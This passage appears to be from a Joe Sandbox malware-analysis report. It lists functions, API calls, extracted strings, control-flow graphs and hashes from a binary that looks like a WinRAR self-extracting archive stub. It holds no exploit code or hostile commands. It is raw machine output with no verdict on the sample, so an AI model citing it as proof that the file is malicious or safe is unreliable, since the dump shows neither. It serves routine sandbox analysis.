AttachConsole call 7ff7f4d6e6e8 call 7ff7f4d6e6d8 GetStdHandle WriteConsoleW Sleep FreeConsole 143->155 156 7ff7f4d6e630 143->156 158 7ff7f4d6e634-7ff7f4d6e63b call 7ff7f4d619d0 ExitProcess 144->158 155->156 156->158 167->107 168->113 173 7ff7f4d6e4ba 168->173 173->107
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                        • API String ID: 751436351-2013832382
                                                        • Opcode ID: 4c8ee9132ef04ca432ae846c1f1bfdea82b2824a45e1760f6555dcb5b633aa6a
                                                        • Instruction ID: 321cbd605bf145814ff23141c9b857d3ffc69c3c09062a3c362f1be26395003f
                                                        • Opcode Fuzzy Hash: 4c8ee9132ef04ca432ae846c1f1bfdea82b2824a45e1760f6555dcb5b633aa6a
                                                        • Instruction Fuzzy Hash: 8B623D31A09F86EAEB11AF66E8801E9B3A4FF45754F800236DB6D567E5EF38D144C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7ECA0 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                        • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                        • API String ID: 3303814210-2702805183
                                                        • Opcode ID: 0e6596488270f79310c24a623b396e3ada833de9f399a29ee3400fe31d1444bd
                                                        • Instruction ID: 1df7a7ee4a87ecd9425d166de2d071e4689466c3218fefd76de6f762c04acfcb
                                                        • Opcode Fuzzy Hash: 0e6596488270f79310c24a623b396e3ada833de9f399a29ee3400fe31d1444bd
                                                        • Instruction Fuzzy Hash: 39D28361A1968297EB20BF26E8D42B9B351FF85780FC04135DB6D467E6EE3CE544C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D80998 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                        • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                        • API String ID: 1830998149-3916287355
                                                        • Opcode ID: 807802d1ee62223aa11093229eb9230b514b44183e94545dd0aead310ba56b57
                                                        • Instruction ID: e98a11ef90e88e2d84d4626040720f3e346cece564047067bd4f4901f8deaa68
                                                        • Opcode Fuzzy Hash: 807802d1ee62223aa11093229eb9230b514b44183e94545dd0aead310ba56b57
                                                        • Instruction Fuzzy Hash: 4F13A122B04B829AEB10AF66D8C02FC77A5FB41798F900535DB2D57AD9DF38D584C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D83FCC Relevance: 47.8, APIs: 22, Strings: 5, Instructions: 539filesleeptimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1527 7ff7f4d83fcc-7ff7f4d840a1 call 7ff7f4d6de50 call 7ff7f4d67a28 call 7ff7f4d7d068 call 7ff7f4d87480 call 7ff7f4d7d6e4 1538 7ff7f4d840d8-7ff7f4d840fb 1527->1538 1539 7ff7f4d840a3-7ff7f4d840b8 1527->1539 1540 7ff7f4d840fd-7ff7f4d84112 1538->1540 1541 7ff7f4d84132-7ff7f4d84155 1538->1541 1542 7ff7f4d840ba-7ff7f4d840cd 1539->1542 1543 7ff7f4d840d3 call 7ff7f4d85adc 1539->1543 1544 7ff7f4d8412d call 7ff7f4d85adc 1540->1544 1545 7ff7f4d84114-7ff7f4d84127 1540->1545 1546 7ff7f4d8418c-7ff7f4d841af 1541->1546 1547 7ff7f4d84157-7ff7f4d8416c 1541->1547 1542->1543 1548 7ff7f4d84655-7ff7f4d8465a call 7ff7f4d8ae54 1542->1548 1543->1538 1544->1541 1545->1544 1545->1548 1553 7ff7f4d841e6-7ff7f4d841f2 GetCommandLineW 1546->1553 1554 7ff7f4d841b1-7ff7f4d841c6 1546->1554 1551 7ff7f4d8416e-7ff7f4d84181 1547->1551 1552 7ff7f4d84187 call 7ff7f4d85adc 1547->1552 1565 7ff7f4d8465b-7ff7f4d84687 call 7ff7f4d8ae54 1548->1565 1551->1548 1551->1552 1552->1546 1560 7ff7f4d841f8-7ff7f4d8422f call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d805e0 1553->1560 1561 7ff7f4d843bf-7ff7f4d843d6 call 7ff7f4d67c10 1553->1561 1557 7ff7f4d841c8-7ff7f4d841db 1554->1557 1558 7ff7f4d841e1 call 7ff7f4d85adc 1554->1558 1557->1548 1557->1558 1558->1553 1593 7ff7f4d84264-7ff7f4d8426b 1560->1593 1594 7ff7f4d84231-7ff7f4d84244 1560->1594 1571 7ff7f4d843d8-7ff7f4d843fd call 7ff7f4d61b70 call 7ff7f4d86dd0 1561->1571 1572 7ff7f4d84401-7ff7f4d8455c call 7ff7f4d61b70 SetEnvironmentVariableW GetLocalTime call 7ff7f4d661e8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7f4d7eb24 call 7ff7f4d69cac call 7ff7f4d7a3f0 * 2 DialogBoxParamW call 7ff7f4d7a4e4 * 2 1561->1572 1573 7ff7f4d84689-7ff7f4d8469a 1565->1573 1574 7ff7f4d846d2-7ff7f4d846e8 call 7ff7f4d6bbf4 1565->1574 1571->1572 1689 7ff7f4d8455e Sleep 1572->1689 1690 7ff7f4d84564-7ff7f4d8456b 1572->1690 1578 7ff7f4d8469c-7ff7f4d846af 1573->1578 1579 7ff7f4d846b8-7ff7f4d846cb call 7ff7f4d85adc 1573->1579 1596 7ff7f4d846ea-7ff7f4d846fd 1574->1596 1597 7ff7f4d84735-7ff7f4d8473f 1574->1597 1585 7ff7f4d846b5 1578->1585 1586 7ff7f4d84924-7ff7f4d84970 call 7ff7f4d8ae54 call 7ff7f4d85350 1578->1586 1579->1574 1585->1579 1638 7ff7f4d84975-7ff7f4d849ab 1586->1638 1605 7ff7f4d84353-7ff7f4d8437d call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d837d0 1593->1605 1606 7ff7f4d84271-7ff7f4d8428b OpenFileMappingW 1593->1606 1603 7ff7f4d84246-7ff7f4d84259 1594->1603 1604 7ff7f4d8425f call 7ff7f4d85adc 1594->1604 1607 7ff7f4d8471b-7ff7f4d8472e call 7ff7f4d85adc 1596->1607 1608 7ff7f4d846ff-7ff7f4d84712 1596->1608 1600 7ff7f4d8478c-7ff7f4d84796 1597->1600 1601 7ff7f4d84741-7ff7f4d84754 1597->1601 1613 7ff7f4d84798-7ff7f4d847ab 1600->1613 1614 7ff7f4d847e3-7ff7f4d847ed 1600->1614 1610 7ff7f4d84756-7ff7f4d84769 1601->1610 1611 7ff7f4d84772-7ff7f4d84785 call 7ff7f4d85adc 1601->1611 1603->1565 1603->1604 1604->1593 1661 7ff7f4d84382-7ff7f4d8438a 1605->1661 1617 7ff7f4d84348-7ff7f4d84351 CloseHandle 1606->1617 1618 7ff7f4d84291-7ff7f4d842b1 MapViewOfFile 1606->1618 1607->1597 1608->1586 1619 7ff7f4d84718 1608->1619 1610->1586 1625 7ff7f4d8476f 1610->1625 1611->1600 1628 7ff7f4d847ad-7ff7f4d847c0 1613->1628 1629 7ff7f4d847c9-7ff7f4d847dc call 7ff7f4d85adc 1613->1629 1621 7ff7f4d8483a-7ff7f4d84844 1614->1621 1622 7ff7f4d847ef-7ff7f4d84802 1614->1622 1617->1561 1618->1617 1631 7ff7f4d842b7-7ff7f4d842e7 UnmapViewOfFile MapViewOfFile 1618->1631 1619->1607 1635 7ff7f4d84846-7ff7f4d84859 1621->1635 1636 7ff7f4d84891-7ff7f4d8491e call 7ff7f4d61b70 * 10 1621->1636 1632 7ff7f4d84804-7ff7f4d84817 1622->1632 1633 7ff7f4d84820-7ff7f4d84833 call 7ff7f4d85adc 1622->1633 1625->1611 1628->1586 1639 7ff7f4d847c6 1628->1639 1629->1614 1631->1617 1642 7ff7f4d842e9-7ff7f4d84342 call 7ff7f4d7dcc8 call 7ff7f4d837d0 call 7ff7f4d6bd2c call 7ff7f4d6be78 call 7ff7f4d6bee8 UnmapViewOfFile 1631->1642 1632->1586 1643 7ff7f4d8481d 1632->1643 1633->1621 1646 7ff7f4d8485b-7ff7f4d8486e 1635->1646 1647 7ff7f4d84877-7ff7f4d8488a call 7ff7f4d85adc 1635->1647 1636->1586 1648 7ff7f4d849ad 1638->1648 1639->1629 1642->1617 1643->1633 1646->1586 1656 7ff7f4d84874 1646->1656 1647->1636 1648->1648 1656->1647 1661->1561 1666 7ff7f4d8438c-7ff7f4d8439f 1661->1666 1670 7ff7f4d843ba call 7ff7f4d85adc 1666->1670 1671 7ff7f4d843a1-7ff7f4d843b4 1666->1671 1670->1561 1671->1670 1675 7ff7f4d8464f-7ff7f4d84654 call 7ff7f4d8ae54 1671->1675 1675->1548 1689->1690 1691 7ff7f4d8456d call 7ff7f4d7da84 1690->1691 1692 7ff7f4d84572-7ff7f4d84595 call 7ff7f4d6bc58 DeleteObject 1690->1692 1691->1692 1700 7ff7f4d8459d-7ff7f4d845a4 1692->1700 1701 7ff7f4d84597 DeleteObject 1692->1701 1703 7ff7f4d845a6-7ff7f4d845ad 1700->1703 1704 7ff7f4d845c0-7ff7f4d845d1 1700->1704 1701->1700 1703->1704 1706 7ff7f4d845af-7ff7f4d845bb call 7ff7f4d63ef4 1703->1706 1707 7ff7f4d845e5-7ff7f4d845f2 1704->1707 1708 7ff7f4d845d3-7ff7f4d845df call 7ff7f4d838e8 CloseHandle 1704->1708 1706->1704 1713 7ff7f4d84617-7ff7f4d8461c call 7ff7f4d7d0e0 1707->1713 1714 7ff7f4d845f4-7ff7f4d84601 1707->1714 1708->1707 1722 7ff7f4d84621-7ff7f4d8464e call 7ff7f4d85bf0 1713->1722 1715 7ff7f4d84603-7ff7f4d8460b 1714->1715 1716 7ff7f4d84611-7ff7f4d84613 1714->1716 1715->1713 1720 7ff7f4d8460d-7ff7f4d8460f 1715->1720 1716->1713 1721 7ff7f4d84615 1716->1721 1720->1713 1721->1713
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                        • API String ID: 3767324925-3710569615
                                                        • Opcode ID: 8342291cec4698ce4c2f469f806b384fae520f8f901e271fb65461c60124e97c
                                                        • Instruction ID: 4384dc80ac407c08fab43e31edc0862fc735762a9f3e532f5bed864d269ebcd6
                                                        • Opcode Fuzzy Hash: 8342291cec4698ce4c2f469f806b384fae520f8f901e271fb65461c60124e97c
                                                        • Instruction Fuzzy Hash: 2D428361A19A8682EB14EF26E8D42BDB365FF45B84FC04235DB6D46AD5EF3CD140C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6A8AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                        • String ID: $%s:$CAPTION
                                                        • API String ID: 1936833115-404845831
                                                        • Opcode ID: 011115dc4585d9970c797897bd28b3e1a41ac96c674e0d9f4ec2e8e75e10504b
                                                        • Instruction ID: 91a6aec3b3f3b6e5176dcb0bdcadc7504d9db68c9493f8e146a8a047409d35a6
                                                        • Opcode Fuzzy Hash: 011115dc4585d9970c797897bd28b3e1a41ac96c674e0d9f4ec2e8e75e10504b
                                                        • Instruction Fuzzy Hash: 3091D532A1864187D718EF2AE8806A9F7A1F785784F845035EF9947BD8DE3CE8058B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7C220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101memorywindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                        • String ID: PNG
                                                        • API String ID: 4097654274-364855578
                                                        • Opcode ID: 75966c197c38ca84d354d4050cb608c385baf803c2fd171f6e68603f3e230818
                                                        • Instruction ID: a66cdd1434975386c72eca226be9f22cc3be3f2234a66c8347ea1dc9195db73b
                                                        • Opcode Fuzzy Hash: 75966c197c38ca84d354d4050cb608c385baf803c2fd171f6e68603f3e230818
                                                        • Instruction Fuzzy Hash: 9041FA21A19A0687EF24AF17D894379B3A0BF84FD5F844435CB2D877E4EE6CE44483A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6647C Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2250 7ff7f4d6647c-7ff7f4d664b3 2251 7ff7f4d664b9-7ff7f4d664c1 2250->2251 2252 7ff7f4d66592-7ff7f4d6659f FindNextFileW 2250->2252 2253 7ff7f4d664c3 2251->2253 2254 7ff7f4d664c6-7ff7f4d664d8 FindFirstFileW 2251->2254 2255 7ff7f4d665b3-7ff7f4d665b6 2252->2255 2256 7ff7f4d665a1-7ff7f4d665b1 GetLastError 2252->2256 2253->2254 2254->2255 2257 7ff7f4d664de-7ff7f4d66506 call 7ff7f4d680b0 2254->2257 2259 7ff7f4d665b8-7ff7f4d665c0 2255->2259 2260 7ff7f4d665d1-7ff7f4d66613 call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d68dc4 2255->2260 2258 7ff7f4d6658a-7ff7f4d6658d 2256->2258 2270 7ff7f4d66508-7ff7f4d66524 FindFirstFileW 2257->2270 2271 7ff7f4d66527-7ff7f4d66530 2257->2271 2261 7ff7f4d666ab-7ff7f4d666ce call 7ff7f4d85bf0 2258->2261 2263 7ff7f4d665c5-7ff7f4d665cc call 7ff7f4d61c80 2259->2263 2264 7ff7f4d665c2 2259->2264 2286 7ff7f4d6664c-7ff7f4d666a6 call 7ff7f4d6e8c0 * 3 2260->2286 2287 7ff7f4d66615-7ff7f4d6662c 2260->2287 2263->2260 2264->2263 2270->2271 2274 7ff7f4d66569-7ff7f4d6656d 2271->2274 2275 7ff7f4d66532-7ff7f4d66549 2271->2275 2274->2255 2279 7ff7f4d6656f-7ff7f4d6657e GetLastError 2274->2279 2277 7ff7f4d6654b-7ff7f4d6655e 2275->2277 2278 7ff7f4d66564 call 7ff7f4d85adc 2275->2278 2277->2278 2281 7ff7f4d666d5-7ff7f4d666db call 7ff7f4d8ae54 2277->2281 2278->2274 2283 7ff7f4d66588 2279->2283 2284 7ff7f4d66580-7ff7f4d66586 2279->2284 2283->2258 2284->2258 2284->2283 2286->2261 2291 7ff7f4d6662e-7ff7f4d66641 2287->2291 2292 7ff7f4d66647 call 7ff7f4d85adc 2287->2292 2291->2292 2293 7ff7f4d666cf-7ff7f4d666d4 call 7ff7f4d8ae54 2291->2293 2292->2286 2293->2281
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                        • String ID:
                                                        • API String ID: 474548282-0
                                                        • Opcode ID: 2505ee538facd5d676127887e6a3cdef276b9a3b5015208b56b412facb3bef77
                                                        • Instruction ID: 8aca715991f2ecc99cc64393519dc91944b347a99dc079e77b2182ac311a5b11
                                                        • Opcode Fuzzy Hash: 2505ee538facd5d676127887e6a3cdef276b9a3b5015208b56b412facb3bef77
                                                        • Instruction Fuzzy Hash: DD619F72A09A4692EB10AF16E48526DB361FB95BA4F804331EBBD43BD9DF3CD444CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D75664 Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: c
                                                        • API String ID: 0-112844655
                                                        • Opcode ID: 628bd18d13ee1dd4a8e7c04dfde5140cfc875f22c02a5843f1e153c5d6109dfb
                                                        • Instruction ID: a9c91fbf33ec8b1691a20fcf3e52423993dda3133d609ac094d260ade4f2043d
                                                        • Opcode Fuzzy Hash: 628bd18d13ee1dd4a8e7c04dfde5140cfc875f22c02a5843f1e153c5d6109dfb
                                                        • Instruction Fuzzy Hash: DEE1D433A286958BE724DF2AD4902ADB7A1F788748F544139DB6953FC8DB3DE840CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7625C Relevance: .5, Instructions: 494COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 544f42cc12b939a1891eee1881038e0693ac490cd5fb5653c4ab6d0a3e854567
                                                        • Instruction ID: 389cc0453334962765198dd26c1783f48dc5dbb9af030c323e63205ec01fbdd0
                                                        • Opcode Fuzzy Hash: 544f42cc12b939a1891eee1881038e0693ac490cd5fb5653c4ab6d0a3e854567
                                                        • Instruction Fuzzy Hash: 92228E62E2C55283EF24AF16D4D4279F690BF407A8F980136DB7D467D5EE2DE80187E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D85350 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
